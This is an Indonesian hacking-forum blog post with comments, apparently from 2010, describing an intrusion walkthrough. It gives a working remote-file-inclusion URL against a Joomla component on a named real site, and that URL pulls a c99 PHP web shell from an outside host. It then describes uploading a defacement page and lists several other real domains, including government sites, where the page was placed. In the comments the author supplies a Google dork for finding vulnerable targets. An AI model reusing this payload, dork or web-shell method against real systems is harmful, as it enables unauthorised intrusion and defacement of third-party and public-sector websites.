Rabu, 18 Januari 2012

Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Teknik User Enumeration

31 July 2010
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner



24
 
0
 
24
share

User Enumeration merupakan kelemahan dari Apache yang memungkinkan kita untuk menjalankan user yang ada di server tersebut.
Cara menguji suatu server vulner terhadap user enumeration – > http://target.com/~root
jika pesan yang muncul “Forbidden” berarti server tersebut vulner.
Pada kasus ini ternyata site http://griyadesign.com/~root muncul pesan “Forbidden” :D

Pesan error pada http://griyadesign.com/~root

Saia coba cari Vulnerability RFI Joomla Component, eh nemu com_joomla-visites vuln, exploitnya bisa diliat di http://www.exploit-db.com/exploits/14476/
Ok langsung eksekusi php shellnya

http://griyadesign.com/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.site.com/c99.txt

Yeah, shell bisa dieksekusi, tinggal upload shell dan jgn lupa halaman php atau html kalian, terserah dah ^^
http://griyadesign.com/default.php

Sekarang coba kita cari site mana aja yang satu server sama http://griyadesign.com
klo saia pake : http://www.yougetsignal.com/tools/web-sites-on-web-server/
Ternyata ada puluhan domain disana :) )

tadi user http://griyadesign.com pada server adalah griyades
/home/griyades/public_html/

Setelah upload halaman php atau html, sekarang kita coba di beberapa site yang satu server dengan http://griyadesign.com
ini hasilnya :

http://15menit.net/~griyades/default.php

http://www.siakkab.go.id/~griyades/default.php

http://www.iii.ac.id/~griyades/default.php

http://takalarkab.go.id/~griyades/default.php

dll :D

Tampilan http://takalarkab.go.id/~griyades/default.php

Regards, vYc0d ;)

BINUS HACKER Binus Hacker Chat and Forum

Komentar

16 Komentar Untuk “Teknik User Enumeration
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. ZeroByte pada 8 August 2010 9:27 am

    maaf bang klo pertanyaannya nubi bnget, tu kok langsung bisa dapet vuln di com_joomla-visites? apa di coba satu2 ya vulnnya?

  2. vyc0d pada 8 August 2010 4:22 pm

    tinggal googling aja bro :D
    kira2 begini keywordnya -> inurl:”com_joomla-visites”

  3. alice pada 25 August 2010 4:28 pm

    jika pesan yang muncul “Forbidden” berarti server tersebut vulner.
    http://target.com/~root

    jadi cara patchnya gimana yah?

    emang pasti site yang muncul “Forbidden” kalau di tambahin ~root berarti vulner

    wah bahaya tuh site aku vuln begitu >,<

  4. hakz pada 5 September 2010 2:20 am

    manteep dah bang.. :)
    ditunggu tutor brikutnya om.. :P

  5. themoffets pada 17 September 2010 1:54 am

    Video Please…

  6. vYc0d pada 17 September 2010 11:08 am

    @alice
    bukan sitenya, tapi servernya
    konfigurasi apache yg harus dibenahin :D
    klo kita sebagai client, tambahin .htaccess aja

    @themoffets
    baca pelan2 aja bro, g’ perlu video pasti paham ;)

  7. beginner buta pada 12 October 2010 8:28 am

    mautanya nih kalo ngehindarin kita di block gimana ya? soalnya sering banget website yang saya kunjungi jadi gelap ga kebaca, itu kenapa ya? padahal sebelumnya engga. lucunya kalo pake ie ga pernah, atau gimana tlong ya?? saya ga bukan hacker lho

  8. ............. pada 22 October 2010 1:32 am

    kasih tau donk aku cheat ninja saga donk…..!!!

  9. Teknik User Enumeration | awangn6600.co.cc pada 22 October 2010 6:50 pm

    [...] From : Binus Hacker Original Source : Teknik User Enumeration This entry was posted in Computer, Hacking. Bookmark the permalink. ← Disconnet Linux [...]

  10. Djoyokusumo pada 4 November 2010 11:24 am

    oke banget infonya bang….

  11. LordCaiL pada 3 January 2011 7:06 pm

    url not found.. bukan forbiden.. gmn tuu?

  12. beckham pada 4 February 2011 3:02 am

    aku ingin mendapatka cara cara hacker indonesia

  13. beckham pada 4 February 2011 3:12 am

    magai

  14. iswahyudi pada 15 March 2011 3:06 pm

    bang kok syntax googling kayak inurl,index.,,,,dsb ga bisa di kompi ane,,,,pasti alamatnya eror
    mohon penjelasannya

  15. vjpith pada 30 March 2011 2:26 pm

    (numpang promo blog saya…) penjelasan tentang hacking, cracking, tips and trik..bisa kalian liat juga disini http://vjpith.blogspot.com

  16. lufi pada 21 June 2011 12:41 pm

    pengen tau gemana caranya sedot cip.
    tolong jelas kan makasih

Silahkan Berikan Tanggapan Anda...